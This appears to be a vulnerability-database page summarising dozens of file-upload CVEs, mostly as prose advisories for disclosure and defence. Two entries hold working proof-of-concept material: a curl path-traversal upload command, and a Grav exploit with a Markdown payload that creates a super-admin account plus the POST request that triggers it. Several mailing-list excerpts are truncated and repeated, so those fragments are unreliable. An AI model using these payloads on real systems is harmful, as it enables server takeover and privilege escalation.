File Upload

Arbitrary file upload leading to remote code execution affects the GutenBee – Gutenberg Blocks WordPress plugin in all versions through 2.20.1, enabling authenticated users with Author role or higher to upload PHP files disguised with double extensions such as shell.json.php. The flaw stems from a permissive strpos() substring check in gutenbee_file_and_ext_json that allows attackers to bypass WordPress filetype validation and execute arbitrary PHP on the server. No public exploit is identified at time of analysis, and the issue is not listed in CISA KEV.

Remote code execution in the Crawlomatic Multipage Scraper Post Generator plugin for WordPress (versions up to and including 2.7.2) allows authenticated users with author-level privileges to execute arbitrary PHP code on the server by abusing the 'callback_raw' or 'callback' shortcode attributes processed by the filter_content function. The flaw stems from passing attacker-controlled input directly to call_user_func() guarded only by is_callable(), which still permits dangerous PHP built-ins like system, shell_exec, exec, passthru, and assert. No public exploit identified at time of analysis, but Wordfence has published a detailed advisory and the shortcode sink is trivially reachable for any author-level account.

An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file.

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/19. A-ADV-20260126-02] CVE-2026-42329: DFIR-IRIS before 2.4.28 Open Redirect (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-03] CVE-2026-42538: DFIR-IRIS before 2.4.28 Insecure File Upload (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-04] CVE-2026-42539: DFIR-IRIS before 2.4.28 Excessive Data Exposure (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-01] CVE-2026-42540: DFIR-IRIS before 2.4.28 Mass Assignment (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-03] CVE-2026-42543: DFIR-IRIS be

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/19. 0126-03] CVE-2026-42538: DFIR-IRIS before 2.4.28 Insecure File Upload (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-04] CVE-2026-42539: DFIR-IRIS before 2.4.28 Excessive Data Exposure (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-01] CVE-2026-42540: DFIR-IRIS before 2.4.28 Mass Assignment (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-03] CVE-2026-42543: DFIR-IRIS before 2.4.28 Cross-Site Request Forgery (CSRF) (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-05] CVE-2026-42547: DF

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/19. @...e.de>) Re: Fixed: local root exploit in haveged, fixed in 1.9.21, CVE-2026-41054 (Hanno Böck <hanno@...eck.de>) Re: Fixed: local root exploit in haveged, fixed in 1.9.21, CVE-2026-41054 (Steffen Nurpmeso <steffen@...oden.eu>) PinTheft Linux LPE (Sam James <sam@...too.org>) [SBA-ADV-20260126-02] CVE-2026-42329: DFIR-IRIS before 2.4.28 Open Redirect (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-03] CVE-2026-42538: DFIR-IRIS before 2.4.28 Insecure File Upload (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-04] CVE-2026-42539: DFIR-IRIS before

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/19. exploit in haveged, fixed in 1.9.21, CVE-2026-41054 (Steffen Nurpmeso <steffen@...oden.eu>) PinTheft Linux LPE (Sam James <sam@...too.org>) [SBA-ADV-20260126-02] CVE-2026-42329: DFIR-IRIS before 2.4.28 Open Redirect (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-03] CVE-2026-42538: DFIR-IRIS before 2.4.28 Insecure File Upload (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260126-04] CVE-2026-42539: DFIR-IRIS before 2.4.28 Excessive Data Exposure (SBA Research Security Advisory <advisory@...-research.org>) [SBA-ADV-20260128-01] CVE-2026-42540: DFIR-IR

Two-factor authentication bypass via TOTP secret disclosure affects FileRise self-hosted file manager before 3.12.0, where the /api/totp_setup.php endpoint can be reached from the intermediate 'pending_login_user' session state that exists after a correct password but before the TOTP check. For accounts that already have TOTP enabled, the endpoint decrypts and returns the existing TOTP secret inside the enrollment QR PNG rather than refusing, so an attacker who already holds the victim's password can extract the seed, compute a valid one-time code, and complete login without the victim's authenticator. No public exploit has been identified at time of analysis and no EPSS score is provided, but the issue fully defeats the second authentication factor.

Arbitrary file upload in the WPify Woo Czech WordPress/WooCommerce plugin (versions through 5.4.1) lets a low-privileged authenticated user upload a dangerous file type - i.e., a PHP web shell - to the web server, leading to remote code execution. The CVSS 3.1 vector (PR:L, S:C, C:H/I:H/A:H) reflects a scope-changing critical-severity flaw scored 9.9 that compromises the entire host once exploited. There is no public exploit identified at time of analysis, it is not listed in CISA KEV, and the EPSS score is very low (0.04%, 13th percentile), indicating little observed exploitation pressure despite the high CVSS.

Remote code execution in Microsoft Azure Orbital Spatio allows unauthenticated network attackers to upload dangerous file types and execute arbitrary code, earning a maximum CVSS 10.0 score with scope change (S:C). Per Microsoft's MSRC advisory, a vendor patch is available, though no public exploit has been identified at time of analysis and the EPSS score was not provided in the source data.

Uncontrolled memory allocation in Mattermost's TIFF image processing allows authenticated users to trigger server-side out-of-memory (OOM) conditions, effectively taking down the collaboration platform. Affected are all Mattermost deployments running versions 10.11.x through 11.6.0. Any account holding file upload or URL-posting permissions can exploit this remotely without elevated privileges, making it a realistic insider or compromised-account threat. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low attack complexity and broad authentication base increase practical risk.

File disclosure via malicious HTML file upload default values in Mothra, the web browser bundled with the 9front Plan 9 fork, allows a remote unauthenticated attacker to exfiltrate arbitrary local files from a victim's filesystem. By crafting a webpage containing a hidden file input element with a pre-set malicious default path, the attacker can cause Mothra to silently submit a targeted local file to an attacker-controlled server upon user interaction. The CVSS 4.0 E:P supplemental metric indicates publicly available proof-of-concept exploit code exists; no CISA KEV listing is present, suggesting exploitation is not yet confirmed at scale.

Unauthenticated arbitrary file upload in the BookingPress Pro WordPress plugin (versions ≤5.6) enables remote code execution by abusing missing file type validation in the bookingpress_validate_submitted_booking_form_func function. Exploitation requires the booking form to include a signature custom field, but otherwise needs no authentication or user interaction. No public exploit identified at time of analysis, though Wordfence's disclosure and the CWE-434 pattern make weaponization straightforward.

Unrestricted file upload in Gmission Web Fax versions 3.0 up to (but not including) 3.1 allows attackers to upload files of dangerous types and trigger remote code inclusion, leading to full confidentiality, integrity, and availability impact on the host. The flaw was reported by FSI and a vendor patch is available, though no public exploit code has been identified at time of analysis. Note that the CVSS 4.0 vector advertises a local attack vector (AV:L) which conflicts with the description's 'Remote Code Inclusion' wording - this discrepancy should be verified.

Unrestricted file upload in WP Swings Gift Cards For WooCommerce Pro plugin (versions up to and including 4.2.6) allows remote unauthenticated attackers to upload malicious files of dangerous types to vulnerable WordPress sites. With a maximum CVSS score of 10.0 and a scope-changed vector, successful exploitation typically leads to remote code execution and full site compromise. No public exploit identified at time of analysis, though the high severity and ease of exploitation make this a priority concern for any WooCommerce site using this plugin.

Arbitrary file write in Altium Enterprise Server ComparisonService allows authenticated workspace users to escape the temporary upload directory and plant files anywhere on the host filesystem via crafted multipart Content-Disposition headers in the Gerber upload APIs. The flaw (CVSS 4.0 score 9.4, CWE-22) escalates to remote code execution by dropping payloads into web-accessible paths or overwriting service binaries, and a vendor patch is available. No public exploit identified at time of analysis.

Unauthenticated remote code execution in the ProSolution WP Client WordPress plugin (versions ≤ 2.0.0) allows attackers to upload malicious PHP files to a web-accessible directory by abusing an array validation mismatch in its upload handler. Because only the first file in a multi-file upload array is checked for extension and MIME type while the remaining files are processed unchecked, attackers can pair a benign first file with a PHP webshell to achieve full code execution on the host. No public exploit identified at time of analysis, but the high CVSS 9.8 score and trivially scriptable nature place this in the realistic mass-exploitation tier for WordPress plugins.

Stored cross-site scripting in Budibase self-hosted deployments (versions before 3.38.2) allows any authenticated user with Builder role - or any BASIC/POWER user with table WRITE permission - to upload SVG, HTML, or JavaScript files containing active content via the /api/attachments/process and /api/attachments/:tableId/upload endpoints. The files are stored in the configured object store (MinIO/S3) with their executable MIME types and served via signed URLs, so any end user viewing an attachment triggers script execution in their browser session. Publicly available exploit code exists (detailed PoC in the GHSA advisory); no public exploit identified in active campaigns at time of analysis.

Authorization bypass in Caddy's remote admin `/config` API (versions 2.4.0-2.11.2) allows a certificate-authenticated remote admin client restricted to a specific array-indexed config path (e.g., `/routes/0`) to read and modify sibling array elements (e.g., `routes[1]`) by requesting the path with a leading-zero index variant (`/routes/01`). The root cause is a semantic mismatch between two internal layers: the authorization layer performs string prefix matching (`strings.HasPrefix`), while the config traversal layer parses index components numerically via `strconv.Atoi()`, so `"01"` passes authorization as a prefix of `"0"` but resolves to integer index 1 during traversal. No public exploit is in CISA KEV, but a complete proof-of-concept with captured curl requests and server responses is publicly documented in the vendor GitHub advisory GHSA-x5w9-xh9r-mvfc.

Arbitrary file upload in the Piotnet Forms WordPress plugin (all versions up to and including 2.1.40) allows unauthenticated remote attackers to upload dangerous file types such as .phar and .phtml, potentially leading to remote code execution on the underlying web server. The flaw stems from an incomplete extension blacklist in the piotnetforms_ajax_form_builder AJAX handler, and exploitation requires that a form on the site include a file upload field. No public exploit identified at time of analysis, but the CVSS 9.8 severity and unauthenticated network attack vector make this a high-priority WordPress plugin issue.

Unauthenticated arbitrary file upload in the Piotnet Addons for Elementor Pro WordPress plugin (versions through 7.1.70) allows remote attackers to upload dangerous file types and potentially achieve remote code execution. The flaw stems from an incomplete extension blacklist in the 'pafe_ajax_form_builder' AJAX handler that fails to block executable wrappers such as .phar and .phtml. No public exploit identified at time of analysis, but the CVSS 9.8 score and unauthenticated network attack vector make this a high-priority issue for any WordPress site running the plugin with a file-upload form field.

Arbitrary code execution in Scalar Astro v0.1.13 allows remote unauthenticated attackers to upload malicious SVG files through the scalar_url query parameter of the Scalar Proxy endpoint. The flaw stems from inadequate validation in the proxy's file handling logic and, per CVSS, requires no authentication or user interaction, though EPSS rates real-world exploitation probability at only 0.02%. No public exploit identified at time of analysis, though a related XSS/Open-Redirect proof-of-concept repository is referenced.

Unrestricted file upload in Metasoft MetaCRM (versions up to 6.4.0 Beta06) allows remote unauthenticated attackers to upload arbitrary files via the /common/jsp/upload3.jsp endpoint. A publicly disclosed exploit exists (CVSS E:P), enabling attackers to upload malicious files without authentication (PR:N), potentially leading to remote code execution. The vendor did not respond to coordinated disclosure, leaving users vulnerable. EPSS data not available, but the combination of network accessibility, no authentication requirement, and public exploit code indicates elevated real-world risk despite the moderate 5.5 CVSS score.

Path traversal in AstrBot dashboard file upload allows authenticated remote attackers to write files outside intended directories via manipulated filenames. Affected versions through 4.23.5 fail to sanitize user-supplied filenames in the post_file function, enabling directory traversal sequences (../, ..\ ) to bypass access controls. Publicly available exploit code exists (GitHub Gist by YLChen-007). Vendor-released patch in version 4.23.6 implements filename sanitization using PurePosixPath normalization and path validation to prevent traversal. CVE assigned CVSS 6.3 (Medium) with low-privilege remote exploitation confirmed. No CISA KEV listing indicates exploitation remains targeted rather than widespread.

Remote code execution in SzafirHost before 1.2.1 allows unauthenticated attackers to bypass JAR signature verification through a ZIP file smuggling technique. The vulnerability exploits a discrepancy between verification logic (JarInputStream reading from file beginning) and class loading (JarFile/URLClassLoader reading Central Directory from file end), enabling attackers to combine a legitimately signed JAR with malicious classes. CERT-PL confirmed this vulnerability, and the vendor released patch version 1.2.1. EPSS data not available, not listed in CISA KEV, requiring user interaction (UI:A) for exploitation.

{@html}` directive without DOMPurify sanitization, despite DOMPurify being available and correctly applied in 39% of the codebase's other rendering locations. This is a regression of a previously patched vulnerability (GHSA-jwf8-pv5p-vhmc) that was fixed in v0.8.0 but reintroduced after that release.

Remote code execution in Vvveb CMS before 1.0.8.3 allows authenticated super_admin users to upload malicious plugin ZIP files containing arbitrary PHP code. Once uploaded, the code executes with web server privileges via unauthenticated HTTP requests to the plugin's public directory, enabling privilege escalation from authenticated admin to system-level code execution. CVSS 8.6 (High) with network attack vector but requires high privileges (PR:H). No active exploitation confirmed at time of analysis, but attack chain is straightforward with publicly documented technique.

Strapi Upload plugin versions 5.33.2 and earlier bypass administrator-configured MIME type restrictions on Content API upload endpoints, allowing authenticated users to upload executable file types (HTML, SVG, JavaScript) that the admin explicitly denies. When uploaded files are served from the same origin as the admin panel (default configuration), an attacker can upload malicious HTML or SVG that executes JavaScript in the admin's browser session, enabling session hijacking and unauthorized administrative actions. Vendor-released patch: Strapi 5.33.3.

Arbitrary file upload in qihang-wms (启航电商WMS) allows unauthenticated remote attackers to execute arbitrary code by uploading malicious files through the ShopOrderImportController component. The vulnerability affects commit 75c15a and potentially other versions of this warehouse management system. EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and no active exploitation has been confirmed by CISA KEV at time of analysis. Public exploit documentation exists via GitHub/Gist references.

Heym before 0.0.21 contains a path traversal vulnerability in the file upload endpoint that allows authenticated users to write attacker-controlled files to arbitrary locations by supplying a crafted filename with traversal sequences. Attackers can exploit the unvalidated filename parameter in the upload_file() handler to bypass path restrictions and write, read, or delete files outside the intended storage directory.

Arbitrary file creation and corruption in dalfox v2 REST API server mode allows unauthenticated remote attackers to write log-formatted data to any filesystem path accessible to the dalfox process. The server exposes output, output-all, and debug JSON fields from the API request directly to the logger's file-write path without validation, and the default configuration omits API key authentication entirely. The vulnerability is fixed in dalfox v2.13.0, released 2025-01-20, which strips all filesystem-dangerous fields from API-sourced requests before passing them to the scan engine. GitHub advisory GHSA-8hf9-3q64-q2qf confirms the issue; no public exploit code is identified at time of analysis, and CISA KEV does not list this CVE.

docuFORM Managed Print Service Client 11.11c allows authenticated remote attackers to upload arbitrary files via the pmupdate.php endpoint, enabling potential remote code execution or system compromise. The vulnerability requires valid user credentials (PR:L per CVSS) but no user interaction, and affects confidentiality, integrity, and availability. No public exploit code or active exploitation has been confirmed at time of analysis.

{UPLOAD_DIR}/{filename}" contents = file.file.read() with open(file_path, "wb") as f: f.write(contents) f.close() ``` The `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk. This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine. --- Execute the following cURL command: ```bash TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc" ``` Verify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server: ```console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$ ```

Emlog is an open source website building system. Prior to version 2.6.11, insecure plugin upload functionality allows attackers to upload and execute arbitrary PHP code, leading to complete server compromise and persistent backdoor installation. This issue has been patched in version 2.6.11.

Remote code execution in Bitrix24 through version 25.100.300 allows authenticated users with SOURCE/WRITE permissions on the Translate Module to execute arbitrary PHP code by uploading malicious PHP and .htaccess files. The vulnerability exploits unrestricted file upload capability in a high-privilege context; while the vendor disputes this as intended behavior for administrative users, the low EPSS score (0.02%) and lack of evidence of active exploitation suggest this poses minimal real-world risk despite the moderate CVSS rating.

Remote code execution in FacturaScripts through authenticated file upload allows attackers with valid credentials to bypass MIME type validation by prepending GIF89a magic bytes to PHP files, resulting in executable files stored in a web-accessible directory. An attacker can upload a malicious PHP file disguised as a GIF image via the product image upload functionality, then directly execute arbitrary commands on the server. The vulnerability affects versions 2025.81 and earlier; publicly available proof-of-concept code exists demonstrating end-to-end exploitation.

FacturaScripts fails to strip EXIF and metadata from user-uploaded images in the Library module, allowing any authenticated user with download access to extract GPS coordinates, device information, timestamps, author names, and other personally identifiable information from downloaded files. An employee uploading a photo taken at their home inadvertently discloses their precise home address to all users with Library access. This affects all image uploads retroactively, with no patched version currently available.

Path traversal in Open Notebook v1.8.3's file upload functionality allows unauthenticated local users to read arbitrary files from the Docker container filesystem. The vulnerability stems from insufficient input validation, enabling attackers to bypass directory restrictions and access sensitive container files including configuration data, environment variables, and application secrets. CVSS 8.2 (High severity) reflects substantial confidentiality impact across system and container scopes, though no public exploit code or active exploitation has been identified at time of analysis.

Path traversal in Open Notebook v1.8.3's file upload allows arbitrary file creation or modification within the Docker container filesystem. Attackers with local access can write files outside intended directories, enabling container escape scenarios, configuration tampering, or privilege escalation by overwriting critical system files. No public exploit identified at time of analysis, but the vulnerability affects default configurations where file upload is accessible.

Remote code execution in Slider Revolution for WordPress versions 7.0.0 through 7.0.10 allows authenticated attackers with subscriber-level privileges to upload executable files via insufficient file type validation in '_get_media_url' and '_check_file_path' functions. A partial patch in 7.0.10 was insufficient, requiring upgrade to 7.0.11 for complete remediation. With CVSS 8.8 (High) and low privilege requirements (subscriber accounts are commonly available or easily created), this represents significant risk for WordPress installations using affected versions, though no active exploitation has been confirmed via CISA KEV at time of analysis.

Remote code execution in CODEASTRO Membership Management System v1.0 allows unauthenticated attackers to upload and execute arbitrary files via the /add_members.php endpoint due to improper file sanitization. The vulnerability enables confidentiality and integrity compromise with CVSS 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N), indicating network-accessible exploitation with no authentication or user interaction required. Public exploit code is available on GitHub.

{ // ← extension blocklist only return ['status' => 'error', 'message' => 'Bad filename']; } ``` `Utils::checkFilename()` (`system/src/Grav/Common/Utils.php:980`) blocks `..`, slashes, null bytes, leading/trailing dots, and the `uploads_dangerous_extensions` list. The default list contains: `php, php2-5, phar, phtml, html, htm, shtml, shtm, js, exe`. **`md` is not on the list**. The MIME check (lines 627-654) uses `Utils::getMimeByFilename($filename)` against the blueprint's `accept` list. With `accept: ['*']`, all filenames pass. After upload, the file is held in flash storage. When the form is submitted, `Form::copyFiles()` (`user/plugins/form/classes/Form.php:1041-1074`) calls `$upload->moveTo($destination)`: ```php $destination = $upload->getDestination(); // ← determined at upload time: // $destination = $page_dir . '/' . $filename $folder = $filesystem->dirname($destination); if (!is_dir($folder) && !@mkdir($folder, 0777, true) && !is_dir($folder)) { ... } $upload->moveTo($destination); ``` `moveTo()` does not check whether `$destination` is an existing protected file - if `form.md` (the page's own content) already exists at the destination, it is **overwritten**. A Grav page's `.md` file is parsed as YAML frontmatter + Markdown content. Whatever content the attacker uploaded becomes the new page definition. **Setup** : Any existing page with a form like this - a "generic upload" form is the realistic case: ```yaml --- title: Upload your file form: name: upform fields: - {name: img, type: file, multiple: false, accept: ['*'], destination: 'self@'} - {name: notes, type: text} buttons: - {type: submit, value: Upload} process: - upload: true - display: thanks --- ``` 1. Atacker uploads a malicious md file that replaces the form's md file. Lets say the form is under the path `/upload`. ```yaml --- title: Pwned form: name: pwn fields: - {name: dummy, type: text} buttons: - {type: submit, value: Submit} process: - save: folder: '../accounts' filename: 'viaup.yaml' extension: yaml operation: create body: | state: enabled email: viaup@example.com fullname: Via Upload title: Admin access: admin: { login: true, super: true } site: { login: true } hashed_password: $2y$10$zGRm19Dk5ivMFZS5taMtU.O8WDUZpTqSsSg8JFs4SwOxJ/N6wl/Uq - display: thanks --- ``` (Hash above is bcrypt for `PwnPass123!`.) 2. Attacker accesses the new markdown file under the original path and loads the new markdown file `GET /upload`. 3. Attacker sends a form POST request to `/upload` and change the form_name to whatever the payload form name is. Keep in mind the nonce has to be valid. ``` POST /upload HTTP/1.1 ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[_json][img]" [] ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="data[notes]" ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__form-name__" pwn ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="__unique_form_id__" 8r7q1iwdnnmcgkohlbtj ------geckoformboundary44d7ad8deb57480098493877a35ad715 Content-Disposition: form-data; name="form-nonce" 4e9417f0c7e89d1ab4e0dbe136ec78bd ------geckoformboundary44d7ad8deb57480098493877a35ad715-- ``` 4. Login as a newly created super admin user. Grav pages that allows user to uploads any file (besides the ones in the blocklist) with the default `self@` configuration is able to upload a malicious markdown file to overwrite the existing markdown file. In this case, unauthenticated users were able to escalate their privileges to super-admin. Block sensitive page-content filenames at upload In `user/plugins/form/classes/Form.php`, after `Utils::checkFilename()` succeeds, add a content-area-aware check: ```php // Block files that would overwrite Grav page content if uploaded into // a page directory. Page templates are .md (Markdown) and .yaml/.yml // (frontmatter overrides). Block both for safety. $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $pageContentExtensions = ['md', 'yaml', 'yml', 'json', 'twig']; if (in_array($ext, $pageContentExtensions, true)) { return [ 'status' => 'error', 'message' => 'File type not allowed for upload (page content files are blocked)', ]; } ``` Add `md, yaml, yml, json, twig, ini` to the global `security.uploads_dangerous_extensions` list - these all carry executable semantics in Grav's runtime even though they are not "PHP".

Remote code execution in Vvveb CMS versions before 1.0.8.2 allows authenticated users with media-upload permissions to execute arbitrary PHP code with web server privileges via a two-stage attack: uploading a malicious .htaccess file to map .phtml extensions to the PHP handler, then uploading a .phtml file containing PHP code. Exploitation requires only low-privileged authentication (CVSS PR:L) and no user interaction (UI:N), making post-authentication compromise straightforward. Vendor-released patch available in version 1.0.8.2 per GitHub security advisory GHSA-wwmv-4g9g-p48g and commit 54a9e846. VulnCheck advisory provides detailed technical analysis of the bypass technique.

Cisco Enterprise Chat and Email (ECE) Lite Agent feature allows authenticated remote attackers with Agent role credentials to upload files containing malicious scripts or HTML, which are then served to other users without adequate content validation. Successful exploitation enables stored cross-site scripting (XSS) attacks in victim browsers. The vulnerability requires valid user credentials and Agent role privileges but no user interaction on the victim side, affecting confidentiality and integrity but not availability.

Time-of-check time-of-use (TOCTOU) vulnerability in Langchain-Chatchat up to 0.3.1.3 allows authenticated local network attackers to manipulate file.filename arguments in the OpenAI-Compatible File Upload API, leading to integrity compromise through race condition exploitation. Publicly available exploit code exists, and the vendor has not responded to early disclosure notification despite proof-of-concept documentation.

Remote code execution in Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10 allows unauthenticated remote attackers to write arbitrary files anywhere on the host filesystem via path traversal in the Submodel HTTP API's file upload fileName parameter, leading to complete system compromise. The vulnerability receives the maximum CVSS score of 10.0 due to network-accessible exploitation requiring no authentication, privileges, or user interaction, with scope change enabling impact beyond the vulnerable component. EPSS data not available; KEV status not confirmed; exploitation status depends on release recency and deployment exposure of this industrial automation SDK.

Remote code execution in Betheme WordPress theme versions up to 28.4 allows authenticated attackers with author-level privileges to upload malicious PHP files disguised as icon packs. The upload_icons() function extracts user-controlled ZIP files into public directories without validating extracted content, enabling arbitrary code execution. This vulnerability requires only author-level WordPress credentials (PR:L) and has network attack vector (AV:N) with low complexity (AC:L), making it readily exploitable by compromised or malicious site contributors. No public exploit code or CISA KEV listing identified at time of analysis.

Path Traversal in Forminator Forms plugin allows unauthenticated remote attackers to read arbitrary files from WordPress servers, potentially exposing database credentials, configuration files, and sensitive user data. Exploitation requires a publicly accessible form with File Upload field and specific 'Save and Continue' behavior settings enabled. CVSS 7.5 (High) with network vector and no authentication required. No CISA KEV listing or public exploit identified at time of analysis, suggesting limited active exploitation despite high theoretical severity.

Unrestricted file upload in funadmin up to version 7.1.0-rc6 allows remote attackers to upload arbitrary files via the Frontend Chunked Upload Endpoint (UploadService::chunkUpload function). The vulnerability stems from insufficient validation of the File parameter and can be exploited without authentication; publicly available exploit code exists and a patch (PR #59) has been released by the vendor.

Unrestricted file upload in code-projects BloodBank Managing System 1.0 via request_blood.php allows authenticated remote attackers to upload arbitrary files with limited impact. The vulnerability requires valid user credentials (PR:L per CVSS vector) but has low confidentiality, integrity, and availability impact (VC:L/VI:L/VA:L). Publicly available exploit code exists; however, the low CVSS score (2.1) and confined impact scope suggest this poses minimal risk despite public disclosure.

MindsDB versions up to 26.01 allow remote unauthenticated attackers to bypass authentication and perform unrestricted file uploads via manipulation of the exec function in the BYOM (Bring Your Own Model) handler's proc_wrapper.py component. Publicly available exploit code exists, and the vendor has not responded to early disclosure, leaving deployed instances vulnerable to remote code execution through malicious model uploads.

Arbitrary file upload in OpenSTAManager 2.10 and earlier allows authenticated high-privilege users to upload malicious files via the module update functionality at modules/aggiornamenti/upload_modules.php, leading to remote code execution. Publicly available exploit code exists (GitHub POC), though EPSS exploitation probability remains low (2%, 5th percentile), suggesting limited observed exploitation activity. CVSS 7.2 reflects high impact but requires high-privilege authentication (PR:H), substantially limiting attack surface to compromised admin accounts or malicious insiders.

Unrestricted file upload vulnerability in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 allows authenticated remote attackers to upload arbitrary files via the /SubstationWEBV2/main/uploadH5Files endpoint, potentially leading to remote code execution or system compromise. The vulnerability is tracked with CVSS 6.3 (moderate severity), publicly available exploit code exists, and the vendor has not responded to early disclosure attempts.

Unrestricted file upload in crmeb_java Admin Upload component (versions up to 1.3.4) allows high-privileged remote attackers to upload arbitrary files by manipulating the model argument in UploadServiceImpl.java, resulting in potential code execution or system compromise. Publicly available exploit code exists and the vendor has not responded to disclosure attempts.

Arbitrary file upload in Sunnet CTMS and CPAS allows authenticated remote attackers with high privileges to upload and execute web shell backdoors, achieving full server compromise. The vulnerability enables complete control over affected systems via malicious file execution, with critical impact to confidentiality, integrity, and availability. Despite requiring high-privilege access (PR:H), the network-accessible attack vector and low complexity (AV:N/AC:L) make this exploitable by any authenticated administrator or privileged user, representing significant risk in environments where such credentials are compromised or where insider threats exist.

Unrestricted file upload in User Registration Advanced Fields plugin for WordPress (≤1.6.20) allows remote unauthenticated attackers to upload executable files and achieve code execution on the web server when Profile Picture fields are enabled in registration forms. Wordfence has documented this critical vulnerability affecting all versions through 1.6.20, with exploitation possible against any site using the Profile Picture form field feature without authentication or user interaction required.

Unrestricted file upload in MacCMS Pro up to version 2022.1.3 allows authenticated high-privilege administrators to upload arbitrary files via the plugin installation handler at /admin/addon/add.html, potentially enabling remote code execution. Publicly available exploit code exists, and the vendor has not responded to early disclosure despite contact.

Path traversal in JeeSite 5.15.1 allows authenticated users with file upload permissions to write arbitrary files to any filesystem location during chunked uploads by manipulating the fileMd5 parameter in /a/file/upload. Attackers can bypass directory restrictions to plant webshells, modify configuration files, or overwrite executables with whitelisted extensions, achieving remote code execution and full system compromise. Scope change in CVSS vector indicates container escape or cross-tenant impact in multi-tenant deployments. No active exploitation confirmed (not in CISA KEV) but vulnerability disclosed via GitHub issue #530.

Path traversal in JeeSite v5.15.1's file upload endpoint allows authenticated users with file upload permissions to write arbitrary files to any filesystem location, enabling remote code execution by uploading malicious files (e.g., JSP webshells) outside intended directories. The vulnerability exists in the fileEntityId parameter of /a/file/upload, bypassing directory restrictions while respecting file extension whitelists. EPSS score of 0.01% (3rd percentile) indicates low predicted exploitation probability, and no public exploit or CISA KEV listing exists at time of analysis, though vendor issue tracker discussion provides technical details that could facilitate POC development.

Authenticated users with theme upload permission in CI4MS (CodeIgniter 4 CMS/ERP) versions 0.26.0.0 through 0.31.6.0 can achieve remote code execution by uploading a malicious ZIP archive containing PHP files. The theme installation routine writes arbitrary files-including executable PHP-directly into the web-accessible public/templates/ directory without extension filtering or content validation, enabling direct HTTP access to webshells. A proof-of-concept exploit is publicly available via the GitHub security advisory (GHSA-fw49-9xq4-gmx6), and the vendor has released a patched version 0.31.7.0 implementing strict file extension allowlists for the public directory.

A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. Affected is the function save_menu of the file /admin/admin_class_novo.php of the component File Extension Handler. Performing a manipulation of the argument img results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

Remote code execution in Cockpit CMS 2.13.5 and earlier allows authenticated users with low privileges to execute arbitrary PHP code on the server. Attackers exploit a filter bypass in the Bucket component's _isFileTypeAllowed function by crafting filenames that evade extension validation, then renaming files to .php for execution. Public proof-of-concept exists (SSVC: poc). EPSS data unavailable, but CVSS 8.8 with network vector and low attack complexity indicates high exploitability once authenticated.

Unrestricted file upload vulnerability in code-projects Online Music Site 1.0 allows authenticated high-privilege administrators to upload arbitrary files via the txtimage parameter in AdminUpdateAlbum.php, potentially leading to remote code execution. The vulnerability is network-accessible, has publicly available exploit code, and requires high-level administrative credentials to exploit, limiting attack surface primarily to insider threats or compromised admin accounts.

ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the file upload functionality where the checkValidFileName() function fails to restrict HTML and HTM file uploads. Authenticated attackers can upload HTML files containing arbitrary JavaScript through the image upload or attachment endpoints, and any user accessing the uploaded file URL will execute the embedded JavaScript in their browser.

A vulnerability was identified in code-projects Online Lot Reservation System 1.0. Affected is an unknown function of the file /edithousepic.php. Such manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit is publicly available and might be used.

A vulnerability was determined in code-projects Online Lot Reservation System 1.0. This impacts an unknown function of the file /activity.php. This manipulation of the argument directory causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.

Unrestricted file upload in code-projects Invoice System Laravel 1.0 allows authenticated attackers to upload arbitrary files via the logo parameter in the /company endpoint, enabling remote code execution or malicious file distribution. Public exploit code is available, and the vulnerability requires only low-privilege authenticated access with no user interaction.

Unrestricted file upload in GreenCMS up to version 2.3 allows authenticated remote attackers to upload arbitrary files via the themeadd function in the custom admin module, potentially enabling remote code execution or content manipulation. Publicly available exploit code exists and the vulnerability affects only end-of-life versions of the product.

